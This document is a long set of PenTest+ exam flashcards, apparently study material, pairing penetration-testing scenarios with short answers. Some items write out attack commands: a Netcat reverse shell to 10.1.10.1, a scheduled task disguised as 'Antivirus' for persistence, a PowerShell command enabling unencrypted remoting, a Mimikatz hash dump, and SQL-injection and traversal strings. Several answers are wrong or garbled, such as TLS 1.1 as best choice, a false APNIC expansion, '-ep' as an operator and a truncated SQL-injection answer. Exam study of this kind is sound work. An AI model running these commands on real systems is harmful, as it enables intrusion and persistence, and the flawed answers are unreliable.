PenTest+
Charles uses the following hping command to send traffic to a remote system. Hping remotesite.com -S -V -p 80 What type of traffic will the remote system see?
TCP SYNs to TCP port 80. Charles has issued a command that asks hping to send SYN traffic (-s) in verbose mode (-v) to remotesite.com on port 80.
Betty is selecting a transport encryption protocol for use in a new public website she is creating. Which protocol would be the best choice?
TLS 1.1
Which of the following types of penetration test would provide testers with complete visibility into the configuration of a web server without having to compromise the server to gain that information?
White box
Which one of the CVSS metrics would contain information about the number of times that an attacker must successfully authenticate to execute an attack?
Au
Susan wants to use a web application vulnerability scanner to help map an organization's web presence and to identify existing vulnerabilities. Which of the following tools is best suited to her needs?
w3af
Which one of the following security assessment tools is not commonly used during the Information Gathering and Vulnerability Identification phase of a penetration test?
Metasploit
Which one of the following tools is an exploitation framework commonly used by penetration testers?
Metasploit
Why is JTAG access particularly useful for penetration testers who have physical access to systems?
JTAG offers debug access directly to memory
What type of adversary is most likely to use only prewritten tools for their attacks?
Script kiddies
Which of the following OS support PowerShell interpreters?
All of the above Linux, Mac, Windows.
What is the full range of ports that a UDP service can run on?
1-65,535
Which one of the following is NOT a reason to conduct periodic penetration tests of systems and applications?
Cost
Which one of the following statements does not correctly describe the Ruby programming language?
It is a compiled language
What type of language is WSDL based on?
XML
Liam executes the following command on a compromised system: nc 10.1.10.1 7337 -e /bin/sh What has he done?
Started a reverse shell using Netcat
Steve is engaged in a penetration test and is gathering information without actively scanning or otherwise probing his target. What type of information is he gathering?
OSINT
Which one of the following attacks is an example of a race condition exploitation?
TOCTTOU (Time-of-check to time-of-use)
What terms describes an organization's willingness to tolerate risk in their computing environment?
Risk appetite
Which one of the following is not a common category of remediation activity?
Testing
What value would be used to encode a space in a URL string?
%20
What comparison operator tests to see if one number is greater than or equal to another in Bash?
-ge
Which one of the following is not a normal communication trigger for a penetration test?
Documentation of a new test?
The Dirty COW attack is an example of what type of vulnerability?
Privilege Escalation
Consider the following Python code: If 1==1: print("hello") elif 3==3: print("hello") else: print("hello") How many times will this code print the word "hello"?
1
Ted wants to scan a remote system using Nmap and uses the following command: nmap 149.89.80.0/24 How many TCP ports will he scan?
1000
Rick wants to look at advertised routes to his target. What type of service should he look for to do this?
A BGP looking glass
Jennifer is reviewing files in a directory on a Linux system and sees a file listed with the following attributes. What has she discovered?
A SUID file
Lucas has been hired to conduct a penetration test of an organization that processes credit cards. His work will follow the recommendations of the PCI DSS. What type of assessment is Lucas conducting?
A compliance-based assessment
What does an MSA typically include?
A master services agreement (MSA) is a contract that defines the terms under which future work will be completed.
Chris wants to acquire a copy of the Windows SAM database system that he has compromised and is running the Metasploit Meterpreter on. What Mimikatz command will allow him to do this?
A meterpreter?mimikatz_command -f samdump::hashes
What type of penetration test is not aimed at identifying as many vulnerabilities as possible and instead focuses on vulnerabilities that specifically align with the goals of gaining control of specific systems or data?
A red-team assessment
What type of assessment most closely simulates an actual attacker's efforts?
A red-team assessment with a black box strategy.
Part of Annie's penetration testing scope of work and rules of engagement allows her physical access to the facility she is testing. If she cannot find a remotely exploitable service, which of the following social engineering methods is most likely to result in remote access?
A thumb drive drop
Andrew knows that the employees at his target company frequently visit a foot discussion site popular in the local area. As part of his penetration testing, he successfully places malware on the site and takes over multiple PCs belonging to employees. What type of attack has he used?
A watering hole attack
Beth recently conducted a phishing attack against a penetration testing target in an attempt to gather credentials that she might use in later attacks. What stage of the penetration testing process is Beth in?
Attacking and Exploiting
Tome recently conducted a penetration test for a company that is regulated under PCI DSS. Two months after the test, the client asks for a letter documenting the test results for its compliance files. What type of report is the client requesting?
Attesting of findings
Which of the following vulnerability scanning methods will provide the most accurate detail during a scan?
Authenticated
Jason is writing a report about a potential security vulnerability in a software product and wishes to use standardized product names to ensure that other security analysts understand the report. Which SCAP component can Jason turn to for assistance?
CPE (Common Product Enumeration) is a SCAP (Security Content Automation Protocol) that provides standardized nomenclature for products names and versions.
Scott wants to crawl his penetration testing target's website and then build a wordlist using the data he recovers to help with his password cracking efforts. Which of the following tools should he use?
CeWL (Custom Word List)
Susan's organization uses a technique that associates hosts with their public keys. What type of technique are they using?
Certificate pinning
Charleen has been tasked with continuing the exploitation process of a Windows 2012 server for which a fellow penetration tester has acquired user-level credentials. She knows that the server is fully patched and does not have exposed vulnerable services. Her goal is to obtain administrative access to the server. Charleen wants to conduct an attack that leverages unquoted service paths. Which of the following users is the most desirable to see listed as "Log On As" in the Services control panel?
Charleen should look for a service that runs as system to have the greatest success. Root is not a commonly used username in Windows, poweruser accounts will typically not have the same access that system does, and the service's own service account will often be very limited.
What type of attack depends upon the fact that users are often logged into many websites simultaneously in the same browser?
Cross-site request forgery
What type of cross-site scripting attack would not be visible to a security professional inspecting the HTML source code in a browser?
DOM-Based XSS
Grace is investigating a security incident where the attackers left USB drives containing infected files in the parking lot of an office building. What stage in the Cyber Kill Chain describes this action?
Delivery
Emily wants to gather information about an organization, but does not want to enter the building. What physical data gathering technique can she use to potentially gather business documents without enter the building?
Dumpster diving
Lisa wants to enumerate possible user accounts and has discovered an accessible SMTP server. What SMTP commands are most useful for this?
EXPN and VRFY
What technique is required to use LSASS to help compromise credentials on a modern Windows system?
Enabling WDigest on a modern Windows systems that you have already compromised will cause it to cache plaintext passwords when each user logs in next.
Which one of the following debugging tools does not support Windows systems?
GDB
Which one of the following approaches, when feasible, is the most effective way to defeat injection attacks?
Input whitelisting approaches define the specific input type or range that users may provide. When developers can write clear business rules defining allowable user input, whitelisting is definitely the most effective way to prevent injection attacks.
While performing an on-site penetration test, Cassandra plugs her laptop into an accessible network jack. When she attempts to connect, however, she does not receive an IP address and gets no no network connectivity. She knows that the port was working previously. What technology has her target most likely deployed?
NAC
What is required for Jason to conduct a cold-boot attack against a system?
Physical access
What term describes a document created to define project-specific activities, deliverables, and timelines based on existing contact
SOW
During an onsite penetration test, what scoping element is critical for wireless assessments when working in shared building?
SSIDs
Which of the following activities constitutes a violation of integrity?
Sensitive or proprietary information was changed or deleted
What comparison operator tests for equality in Ruby?
The == operator tests for equality in Ruby and Python, while the != operator tests for inequality in those languages. The -ep operator tests for equality in Bash and PowerShell, while the -ne operator tests for in those languages.
What occurs during a quid pro quo social engineering attempt?
The target is made to feel indebted
While Angela is conducting a penetration test, she gains access to a Windows deployment services server for her target organization. What critical information can she expect to obtain from the unattended installation files she finds there?
The unattended installation files include local administrator passwords stored in either plain text or Base-64 form. Angela can easily acquire the passwords from those files using Metasploit's enum-unattend tool or manually if she chooses to.
Why would a penetration tester look for expired certificates as part of an information-gathering and enumeration exercise?
They indicate services may not be properly updated or managed.
Gary ran an Nmap scan of a system and discovered that it is listening on a port 22 despite the fact that it should not be accepting SSH connections. What finding should he report?
Unnecessary open services
In what type of attack does the attacker seek to gain access to resources assigned to a different virtual machine?
VM escape
What Unix command can you use to listen for input on a network port?
nc
Vincent wants to gain access to workstations at his target but cannot find a way into the building. What technique can he use to do this if he is also unable to gain access remotely or on site via the network?
USB key drop
What is the most recent version of CVSS that is currently available?
3.0
Edward Snowden gathered a massive quantity off sensitive information from the National Security Agency and released it to the media. What type of attack did he wage?
Disclosure
Steve is working from an unprivileged user account that was obtained as part of a penetration test. He has discovered that the host he is on has Nmap installed and wants to scan other hosts in his subnet to identify potential targets as part of a pivot attempt. What Nmap flag is he likely to have to use to successfully scan hosts from this account?
-sT the TCP connect scan is often used when an un-privileged account is the tester's only option.
Chris is conducting an onsite penetration test. The test is a gray box test, and he is permitted onsite but has not been given access to the wired or wireless networks. He knows he needs to gain access to both to make further progress. Which of the following NAC systems would be the easiest for Chris to bypass?
A MAC address filter
What type of wireless attack focuses on tricking clients into using less secure protocols?
A downgrade attack
Karen identifies TCP port 8080 and 8443 open on a remote system during a port scan. What tool is her best option to manually validate the services running on these ports?
A web browser. Many system administrators move services from their common service ports to alternate ports and 808 and 8443 are likely alternate HTTP (TCP 80) and HTTPS (TCP 443) server ports, and she will use a web browser to connect to those ports to check them.
Jack is conducting a penetration test for a customer in Japan. What NIC is he most likely to need to check for information about his client's networks?
APNIC (Asian Pacific Network Interface Card)
Ken is planning to conduct a vulnerability scan of an organization as part of a penetration test. He is conducting a black box test. When would it be appropriate to conduct an internal scan of the network?
After compromising an internal host
Chris is conducting an onsite penetration test. The test is a gray box test, and he is permitted onsite but has not been given access to the wired or wireless networks. He knows he needs to gain access to both to make further progress. If Chris wants to set up a false AP, which tool is best suited to his needs?
Aircrack-ng has fake-AP functionality built in, with tools that will allow Chris to identify valid access points, clone them, disassociate a target system, and then act as a man in the middle for future traffic.
What tool can white box penetration testers use to help identify the systems present on a network prior to conducting vulnerability scans?
Asset Inventory
What type of Bluetooth attack attempts to send unsolicited messages via Bluetooth devices?
Bluejacking
In what type of attack does the attacker place more information in a memory location than is allocated for that use?
Buffer overflow
Which one of the following values for the confidentiality, integrity, or availability CVSS metric would indicate the potential for total compromise of a system?
C (Complete)
Jessica is reading reports from vulnerability scans run by a different part of her organization using different products. She is responsible for assigning remediation resources and is having difficulty prioritizing issues from different sources. What SCAP component can help Jessica with this task?
CVSS (Common Vulnerability Scoring System)
Steve has set his penetration testing workstation up as a man in the middle between his target and a FTP server. What is the best method for him to acquire FTP credentials?
Capture traffic with Wireshark
Chris is conducting an onsite penetration test. The test is a gray box test, and he is permitted onsite but has not been given access to the wired or wireless networks. He knows he needs to gain access to both to make further progress. Once Chris wants to set up a false AP, which tool is best suited to his needs?
Chris can use ARP spoofing to represent his workstation spoofing to represent his workstation as legitimate system that other devices are attempting to connect to. As long as his responses are faster, he will then receive traffic and can act as a man in the middle. Network sniffing is useful after this to read traffic, but it isn't useful for most traffic on its own on a switched network. SYN floods are not useful for gaining credentials.
Sarah is conducting a penetration test and discovers a critical vulnerability in an application. What should she do next?
Consult the SOW
What approach to vulnerability scanning incorporates information from agents running on the target servers?
Continuous monitoring
Renee is configuring her vulnerability management solution to perform credentialed scans of servers on her network. What type of account should she provide to the scanner?
Credentialed scans only require read-only access to target servers. Renee should follow the principle of least privilege and limit the access available to the scanner.
Chris cross compiles code for his exploit and then deploys it. Why would he cross-compile code?
Cross-compiling code is used when a target platform is on a different architecture. Chris may not have access to a compiler on his target machine, or he may need to compile the code for an exploit from his primary workstation.
Monica discovers that an attacker posted a message in a web forum that she manages that is attacking users who visit the site. Which one of the following attack types is most likely to have occurred?
Cross-site scripting
Which one of the following is not a common source of information that may be correlated with vulnerability scan results?
Database Tables
Lauren has acquired a list of valid user accounts but does not have passwords for them. If she has not found any vulnerabilities but believes that the organization she is targeting has poor password practices, what type of attack can she use to try to gain access to a target system where those usernames are likely valid?
Dictionary attacks
Which of the following technologies, when used within an organization, is the LEAST likely to interfere with vulnerability scanning results achieved by external penetration testers?
Encryption
Cynthia wants to find a Metasploit framework exploit that will not crash the remote service she is targeting. What ranking must the exploit she chooses meet or exceed to ensure this?
Excellent
John has gained access to a system that he wants to use to gather more information about other hosts in its local subnet. He wants to perform a a port scan but can not install other tools to do so. Which of the following tools is not usable as a port scanner?
ExifTool
Angela recovered a PNG image during the early intelligence-gathering phase of a penetration test and wants to examine it for useful metadata. What tool could she most successfully use to do this?
Exiftool is designed to pull metadata from images and other files.
Ellie has placed her workstation as the man in the middle, shown in the following image. What does she need to send at point X to ensure that the downgrade attack works properly?
FIN, ACK
Tara recently analyzed the results of a vulnerability scan report and found that a vulnerability reported by the scanner did not exist because the system was actually patched as specified. What type of error occurred?
False positive
Gary is conducting a black box penetration test against an organization and is being provided with the results of vulnerability scans that the organization already ran for use in his tests. Which one of the following scans is most likely to provide him with helpful information within the bounds of his test?
Full external scan. This is a black box test, so it would not be appropriate for Gary to have access to scans conducted on the internal network.
After gaining access to Windows system, Fred uses the following command: SchTAsks /create /SC Weekly /TN "Antivirus" /TR C:\Users\SSmith\av.exe" /ST 09:00 What has he accomplished?
He has scheduled his own executable to run weekly
Cameron runs the following command via an administrative shell on a Windows system he has compromised. What has he accomplished? $command = 'cmd /c powershell.exe -c Set-WSManQuickConfig -Force;Set-Item WSMan:\localhost\Service\Auth\Basic -Value $True;Set-Item WSMan:\localhost\Service\AllowUnencrypted -Value $True;Register-PSSessionConfiguration -Name Microsoft.PowerShell -Force'
He has set up PSRemoting.
Kevin recently identified a new security vulnerability and compute its CVSSv2 base score as 6.5. Which risk category would this vulnerability fall into?
High
Mike discovers a number of information exposure vulnerabilities while preparing for the exploit phase of a penetration test. If he has not been able to identify user or service information beyond vulnerability details, what priority should he place on exploiting them?
High priority; exploit early
Christina wants to use THC Hydra to brute-force SSH passwords. As she prepares to run the command, she knows that she recalls seeing the -t flag. What should she consider when using this flag?
Hydra uses 16 parallel tasks per target by default, but this can be changed using the -t flag.
What software component is responsible for enforcing the separation of guest systems in a visualized infrastructure?
Hypervisor
Which one of the following terms is not typically used to describe the connection of physical devices to a network?
IDS
Alan is reviewing web server logs after an attack and finds many records that contain semicolons and apostrophes in queries from end users. What type of attack should he suspect?
In a SQL injection attack, the attacker seeks to use a web application to gain access to an underlying database. Semicolons and
Which one the following conditions would not result in a certificate warning during a vulnerability scan of a web server?
Inclusion of a public encryption key
Which one of the following categories of systems is most likely to be disrupted during a vulnerability scan?
Internet of Thing (IoT) devices are examples of nontraditional systems that may be fragile and highly susceptible to failure during vulnerability scans.
Charles to deploy a wireless intrusion detection system. Which of the following tools is best suited to that purpose?
Kismet is specifically designed to act as a wireless IDS in addition to its other wireless packet capture features. WiFite is designed for wireless network auditing, Aircrack provides a variety of attack tools in addition to its capture and injection capabilities for wireless traffic. SnortiFi was made up for this question.
Which one the following values for the CVSS access complexity metric would indicate the specified attack is the simplest to exploit?
Low
Ellie wants to clone an RFID entry access card. Which type of card is most easily cloned using inexpensive cloning devices?
Low frequency 125 to 134.2 KHz card
Matt wants to pivot from a Linux host to other hosts in the network but is unable to install additional tools beyond those found on a typical Linux server. How can he leverage the system he is on to allow vulnerability scans of those remote hosts if they are firewalled against inbound connections and protected from direct access from his penetration testing workstation?
Matt can safely assume that almost any modern Linux system will have SSH, making SSH tunneling a legitimate option. If he connects outbound from the compromised system to his and creates a tunnel allowing traffic in, he can use his own vulnerability scanner through the tunnel to access the remote systems.
Tim has selected his Metasploit exploit and set his payload as cmd/unix/generic. After attempting the exploit, he receives the following output. What went wrong? "msf exploit (unix/misc/distcc_exec) > exploit Exploit failed: The following options failed to validate: RHOST. Exploit completed, but no session was created.
Metasploit needs to know the remote target host, known as rhost, and this was not set. Tim can set it by typing set rhost [ip address] with the proper IP address. Some payloads require lhost, or local host, to be set as well, making it a good idea to use the show options command before running exploit.
If Charles selects the Ruby on Rails vulnerability, which of the following methods cannot be used to search for an existing Metasploit Vulnerability?
Metasploit searching supports multiple common vulnerability identifier systems, including CVE (Common Vulnerabilities and Exposures), BID, and EDB (Exploit Database), but MSF was made up for this question. It may sound familiar, as the Metasploit console command is msfconsole.
Jacob wants to capture user hashes on a Windows network. Which tool could he select to gather these from broadcast message?
Metasploit's SMB capture mode, Responder, and Wireshark can all capture SMB hashes from broadcasts. Impacket doesn't build this capability in but provides a wide range of related tools, including the ability to authenticate with hashes once you have captured them. If you're wondering about encountering this type of question on the exam, remember to eliminate the answers you are sure of, to reduce the number of remaining options. here you can likely guess that Metasploit has a module for this, and Wireshark is a packet capture tool, so capturing traffic may require work, but would be possible. Now you're down to a 50/50 chance.
Brian is seeking to determine the appropriate impact categorization for a federal information system as he plans the vulnerability scanning controls for that system. After consulting management, he discovers that the system contains information that, if disclosed improperly, would have a serious adverse impact on the organization. How should this system be categorized?
Moderate. Systems have a moderate impact from a confidentiality perspective if the unauthorized disclosure of information could be expected to have a serious adverse effect on organization operations, organizational assets, or individuals.
After running an SNMP sweep, Greg finds that he didn't receive any results. If he knows there are no network protection devices in place and that there are devices that should respond to SNMP queries, what problem does he most likely have?
Most modern SNMP deployments use a non-default community string. If Greg does not have the correct community string, he will not receive the information he is looking for.
Tom is reviewing a vulnerability scan report and finds that one of the servers on his network suffers from an internal IP address disclosure vulnerability. What protocol is likely in use on this network that resulted in this vulnerability?
NAT
What does a result of *** mean during a traceroute?
No response to the query, perhaps a timout, but traffic going through.
Angela wants to run the John the Ripper against a hashed password file she has acquired from a compromise. What information does she need to know to successfully crack the file?
Nothing. John includes automatic hash type detection, so Angela can simply feed John the Ripper the hashed password file. If it is in a format that John recognizes, ti will attempt to crack the passwords.
Duran an Nmap scan, Casey uses the -o flag. The scan identifies the host as follows: Running Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.33 What can she determine from this information?
OS identification in Nmap is based on a variety of response attributes. In this case, Nmap's best guess is that the remote host is running a Linux 2.6.9-2.6.33 kernel, but it cannot be more specific.
After gaining access to a Linux system through a vulnerable service, Cassandra wants to list all of the user accounts on the system and their home directories. Which of the following locations will provide list?
On most Linux systems, the /etc/passwd file will contain a list of users as well as their home directories. Capturing both /etc/passwd and /etc/shadow are important for password cracking, making both desirable targets for penetration testers.
Charles runs an Nmap scan using the following command: Nmap -sT -sV -T2 -p 1-65535 example.com After watching the scan run for over two hours, he realizes that he needs to optimize the scan .Which of the following is not a useful way to speed up his scan?
Only scanning via UDP will not miss any TCP connections. Setting the scan to faster timing (3 or faster), changing from a TCP connect scan to a TCP SYN scan, or limiting the number of ports tested are all valid ways to speed up a scan.
What built-in Windows server administration tool can allow command-line PowerShell access from other systems?
PSRemote, or PowerShell Remote, provides command-line access from remote systems. Once you have established a remote trust relationship using valid credentials, you can use PowerShell commands for a variety of exploit and information gathering activities, including the use of dedicated PowerShell exploit tools.
Cassandra wants to attack a WPS-enabled system. What attack technique can she use against it?
Pixie dust
What is the default read-only community string for many SNMP devices?
Public
Tonya is configuring vulnerability scans for a system that is subject to the PCI DSS compliance standard. What is the minimum frequency with which she must conduct scans?
Quarterly
Alex wants to use rainbow tables against a password file she has captured. How do rainbow tables crack passwords?
Rainbow tables are listed of pre-computed hashes for all possible passwords for a given set of password rules. Rainbow table tools compare hashes to the previously calculated hashes, which match to known values. This is done via a relatively fast database lookup, allowing fast "cracking" of hashed passwords, even though hashes aren't reversible.
Which one of the following activities is not part of the vulnerability management life cycle?
Reporting
Ryan is planning to conduct a vulnerability scan of a business-critical system using dangerous plug-ins. What would be the best approach for the initial scan?
Run the scan in a test environment
Alice discovers a rating that her vulnerability scanner lists as 9.3 out of 10 on its severity scale. The service that is identified runs on TCP 445. What type of exploit is Alice most likely looking to use on this server?
SMB exploit
Which of the following is not an example of a vulnerability scanning tool?
Snort
Ryan is conducting a penetration test and is targeting a database server. Which one of the following tools would best assist him in detecting vulnerabilities on that server?
Sqlmap is a dedicated database vulnerability scanner and is the most appropriate tool for use in this scenario.
Which one the following factors is least likely to impact vulnerability scanning schedules?
Staff availability
Adam is conducting a penetration test of an organization and is reviewing the source code of an application for vulnerabilities. What type of code testing is Adam conducting?
Static code analysis
What attack technique can allow the pen-tester visibility into traffic on VLANs other than their native VLAN?
Switch spoofing relies on a switch interface that is configured as either dynamic desirable, dynamic auto, or trunk mode, allowing an attacker to generate dynamic trunk protocol messages. The attacker can then access traffic from all VLANs.
Which one of the following protocols should never be used on a public network?
Telnet
Chris runs an Nmap scan of 10.10.0.0/16 network that his employer uses as an internal network range for the entire organization. If he uses the -T0 flag, what issue is he likely to encounter?
The -T flag in Nmap is used to set scan timing. Timing setting range from 0 (paranoid) to 5 (insane). By default, it operates at 3, or normal. With timing set to a very slow speed, Chris will run his scan for a very, very long time on a /16 network.
Which type of organization is the most likely to be impacted by a law requiring them to conduct vulnerability test
The Federal Security Management Act (FISMA) requires that government agencies conduct vulnerability scans.
If Charles wants to build a list of additional system user accounts, which of the vulnerabilities is most likely to deliver that information?
The OpenSSH vulnerability
Charles has recently completed a vulnerability scan of a system, and needs to select the best vulnerability to exploit from the following listing: 1. Ruby on Rails Action Pack Remote Code Execution Vulnerability (Windows) 2. OpenSSH Denial of Service and User Enumeration Vulnerabilities (Windows) 3. MySQL/MariaDB weak password Which of the entries should Charles prioritize from this list if he wants to gain access to the system?
The Ruby on Rails vulnerability is the only vulnerability that specifically mentions remote code execution, which is most likely to allow Charles to gain access to the system.
Which of the following Nmap output formats is unlikely to be useful for a penetration tester?
The Script Kiddie output format that Nmap supports is entirely for fun-you should never have a practical need to use the -os flag for an actual penetration test.
During an early phase of his penetration test, Mike recovers a binary executable file he wants to quickly analyze for useful information. Which of the following tools will quickly give him a view of potentially useful information in the binary?
The Strings command parses a file for strings of text and outputs them. It is often useful for analyzing binary files, since you can quickly check for useful information with a single quick command-line too.
Jessica wants to list the domain password policy for a Windows domain. What net command can she use to do this?
The Windows net commands can display a wealth of information about a local domain, and the password policy can be reviewed by using the net accounts /domain command.
John wants to retain access to a Linux system. Which of the following is not a common method of maintaining persistence on Linux servers?
The Windows task schedule is used for scheduled tasks. On Linux, cron jobs are set to start applications and the other events on time. Other common means of creating persistent access to Linux systems include modifying system daemons, replacing services with trojaned versions, or even simply creating user accounts for later use.
Cynthia attempted a DNS poisoning attack as shown here. After her attempt, she does not see any traffic from her target system. What most likely happened to cause the attack to fail?
The injection was too slow.
A few days after exploiting a target with Metasploit Meterpreter payload, Robert loses access to the remote host. What most likely happened?
The system was rebooted
Ron wants to use arpspoof to execute a man-in-the-middle attack between target host 10.0.1.5 and a server at 10.0.1.25, with a network gateway of 10.0.1.1. What commands does he need to run to do this? (Choose two.)
To fully act as a man in the middle, Ron needs to spoof both the server and target so that they each think that his PC is the system they are sending to. Spoofing the gateway 10.0.1.1 or broadcast address 255.255.255.255 will not serve his purposes.
Which of the following tools will not allow Alice to capture NTLM v2 hashses over the wire for use in a pass-the-hash attack?
Unlike the other options listed here, Mimikatz pulls over hashes from the lsass process. Since the question specifically notes "over the wire," Mimikatz is the only tool that cannot be used for that.
Which one of the following metrics is not included in the calculation of the CVSS exploitability score?
Vulnerability Age
Mika runs the following Nmap scan: Nmap -sU -sT -p 1-65535 example.com What information will she receive?
Vulnerability scanner. UDP scan. TCP connect/full connect scan, meaning the user can't create raw packets for a SYN scan or is scanning an IPv6 network. Results for ports 1-65535.
Which of the following tools provides information about a domain's registrar and physical location?
Whois provides information that can include the organiztion's physical address, registrar, contact information, and other details.
After running an Nmap scan of a system, Lauren discovers that TCP ports 139, 443, and 3389 are open. What operating system is she most likely to discover running on the system?
Windows. Port 3389 is Remote Desktop Protocol (RDP).
Which one of the following activities assumes that an organization has already been compromised?
Threat hunting
Allan wants to gain access to a target company's premises but discovers that his original idea of jumping the fence probably isn't practical. Which factor is least likely to prevent him from trying to jump the fence?
A gate
During the scoping phase of a penetration test, Lauren is provided with the IP range of the systems she will test, as well as information about what the systems run, but she does not receive a full network diagram. What type of assessment is she most likely conducting?
A gray box assessment
Mike wants to enter an organization' high-security data center. Which of the following techniques is most likely to stop his tailgating attempt?
A mantrap
What control is most commonly used to secure access to API (Application Program Interface) interfaces?
API keys
Which of the following threat actors is the most dangerous based on the adversary tier list?
APTs
Alaina wants to conduct a man-in-the-middle attack against a target system. What technique can she use to make it appear that she has the IP address of a trusted server?
ARP spoofing
During what phase of the Cyber Kill Chain does an attacker steal information, use computing resources, or alter information without permission?
Action on Objectives
What is the final stage of the Cyber Kill Chain?
Action on Objectives
Tina is conducting a penetration test and is trying to gain access to a user account. Which of the following is a good source for obtaining user account credentials?
All of the above. Social Engineering, Default account lists, and Password dumps from compromised sites.
For what type of activity would you use the tools HULK, LOIC, HOIC, and Slow Loris?
All of these tools are DoS tools. While some of them have been used for DDoS attacks, they are not DDoS tools of their own.
Examine the code snippet below. In what language is this code written? begin system 'nmap ' + ip rescue puts 'An error occurred.' end
Among other characteristics, the rescue keyword for error handling is unique to Ruby script.
Assuming no significant changes in an organization's cardholder data environment, how often does PCI DSS require that a merchant accepting credit cards conduct penetration testing?
Annually
Matt is part of a penetration testing team and is using a standard toolkit developed by his team. He is executing a password cracking script named password.sh. What language is this script most likely written in?
Bash
Which of the following pairs of languages allow the direct concatenation of a string and an integer?
Bash and PowerShell allow the direct concatenation of strings and numeric values to strings prior to concatenation.
Jen has been contracted to perform a penetration test against Flamingo, Inc. As part of her penetration test, she has been asked to conduct a phishing campaign and to use the results of that campaign to gain access to Flamingo systems and networks. The scope of the penetration test does not include a physical penetration test, so Jen must work entirely remotely. Jen wants to deploy a malicious website as part of her penetration testing attempt so that she can exploit browsers belonging to employees. What frame work is best suited to this?
BeEF
What penetration testing strategy is also know as "zero knowledge" testing?
Black box testing
After compromising a remote host, Cameron uses ssh to connect to port 4444 from his penetration workstation. What type of remote shell has he set up?
Cameron has set up a bind shell, which connects a shell to a service port. A reverse shell would have initiated a connection from the compromised host to his penetration testing workstation (or another system Cameron has access to). The question does not provide enough information to determine if the shell might be a root shell, and blind shell is not a common penetration testing term.
Tom is a software developer who creates code for sale to the public. He would like to assure his users that the code they receive actually came from him. What technique can he use to best provide this assurance?
Code signing
Tom is running a penetration test in a web application and discovers a flaw that allows him to shut down the web server remotely. What goal of penetration testing has Tom most directly achieved?
Denial
What vulnerability should Charles target if he discovers a service with the following line in its system invocation? Pathvariable = "C:\Program Files\Common Files\exampleapp example.exe"
Developers often inadvertently leave out quotes or forget to escape quotes properly, allowing penetration testers to insert programs in the path that will execute instead of the desired service. Charles should place his own program in the path and then attempt to cause the service or system to restart, replacing the running legitimate service with his own.
Joe's adventure in web server log analysis are not yet complete. As he continues to review the logs, he finds the request http://www.mycompany.com/../../../etc/passwd What type of attack was most likely attempted?
Directory traversal
Alice has deployed physical keyloggers to target systems. What issue is most commonly associated with physical keyloggers?
Discovery
Dan is attempting to use VLAN hopping to send traffic to VLANs other than the one he is on. What technique does the following diagram show?
Double Tagging
Which one of the following is a debugging tool compatible with Linux systems?
GDB
During a penetration test, Alex discovers that he is unable to scan a server that he was able to successfully scan earlier in the day from the same IP address. What has most likely happened?
His IP address was blacklisted
Jim wants to crack the hashes from a password file he recovered during a penetration test. Which of the following methods will typically be fastest, presuming he knows he hashing method and has the appropriate files and tools to take advantage of each tool?
If Jim has the right rainbow tables for the hashing method and password and character set, Rainbow Crack should be the fastest. Hashcat would be the second fastest when taking advantage of a powerful graphic card, and John the Ripper with typically be the slowest of the password cracking method listed. CeWL is a wordlist or dictionary generator and isn't a password cracker.
Jen has been contracted to perform a penetration test against Flamingo, Inc. As part of her penetration test, she has been asked to conduct a phishing campaign and to use the results of that campaign to gain access to Flamingo systems and networks. The scope of the penetration test does not include a physical penetration test, so Jen must work entirely remotely. Jen wants to send a phishing message to employees at the company. She wants to learn the user IDs of various targets in the company and decides to call them using a spoofed VoIP phone number similar to those used inside the company. Once she reaches her targets, she pretends to be an administrative assistant working with one of Flamingo's senior executives and ask her targets for their email account information. What type of social engineering is this?
Impersonation
Ben wants to conduct a DLL hijacking attack. Which directory will Windows search for a DLL if it does not have a specific know location it?
In order, Windows will search the directory the application is in, the current directory, the Windows system directory, the Windows directory, and then directories listed in the Path variable for DLLs if it does not have a specific file location listed for it.
Which one the following is NOT a benefit of using an internal penetration testing team?
Independence
Upon further inspection, Joe finds a series of thousands of requests to the same URL coming from a single IP address. Here are a few examples: http://www.mycompany.com/servicestatus.php?serviceID=1 http://www.mycompany.com/servicestatus.php?serviceID=2 http://www.mycompany.com/servicestatus.php?serviceID=3 http://www.mycompany.com/servicestatus.php?serviceID=4 http://www.mycompany.com/servicestatus.php?serviceID=5 http://www.mycompany.com/servicestatus.php?serviceID=6 What type of vulnerability was the attack likely trying to exploit?
Insecure direct object reference
Brian ran a penetration test against a school's grading system and discovered a flaw that would allow students to alter their grades by exploiting a SQL injection vulnerability. What type of control should he recommend to the school's cybersecurity team to prevent students from engaging in this activity?
Integrity
Kaiden would like to perform an automated web application security scan of a new system before it is moved into production. Which one of the following tools is best suited for this task?
Kaido
Wendy is reviewing the results of a penetration test and learns that her organization uses the same local administrator password on all systems. Which one of the following tools can help her resolve this issue?
LAPS
Examine the following network diagram. What is the most appropriate location for a web application firewall (WAF) on this network?
Location D, between the DMZ and Web Server.
Cameron is preparing to travel to another state to perform a physical penetration test. What penetration testing gear should he review the legality of before leaving for that state?
Lockpicks
Which one of the following tools is NOT a password cracking utility?
OWASP ZAP
Selah wants to use a brute-force attack against the SSH service provided by one of her targets. Which of the following tools is not designed to brute-force services like this?
Minotaur
What type of legal agreement typically covers sensitive data and information that a penetration tester may encounter while performing an assessment?
NDA
What specialized type of legal document is often used to protect the confidentiality of data and other information that penetration testers may encounter?
NDA (Non-Disclosure Agreement)
Which one of the following is not an open-source intelligence gathering tool?
Nessus is a commercial vulnerability scanner.
Which one of the following techniques is not appropriate remediation activity for a SQL injection vulnerability?
Network firewall
Which one of the following vulnerability scanners is specifically designed to test the security of web applications against a wide variety of attacks?
Nikto
What is the limit to the number of elsif clauses in a Ruby script
No limit
Joe checks his web server logs and sees that someone sent the following query string to an application running on the server: http://www.mycompany.com/servicestatus.php?serviceID-892&service ID=892';DROP TABLE Services;-- What type of attack was most likely attempted?
Parameter pollution
A USB key drop is an example of what type of technique?
Physical honeypot
Rich recently got into trouble with a client for using an attack tool during a penetration test that caused a system outage. During what stage of the penetration testing process should Rich and his clients have agreed upon the tools and techniques that he would use during the test?
Planning and Scoping
Elaine wants to ensure that the limitations of her red-team penetration test are fully explained. Which of the following are valid disclaimers for her agreement?
Point-in-time & Comprehensiveness
Which one of the following lines of code would create an array in a PowerShell script?
PowerShell requires the use of the $ before an array name in an assignment operation. The elements of the array are then provided as a comma-separated list.
Which one of the following programming languages does not offer a built-in robust error-handling capability?
PowerShell, Python, and Ruby all support variants of the try..catch clause. Bash does not provide a built-in error handling capability.
Steve inadvertently sets off an alarm and is discovered by a security guard ruing an on-site penetration test. What should his first response be?
Provide his pretext
Examine the following line of code. In what programming language is it written? print("The system contains several serious vulnerabilities.")
Python
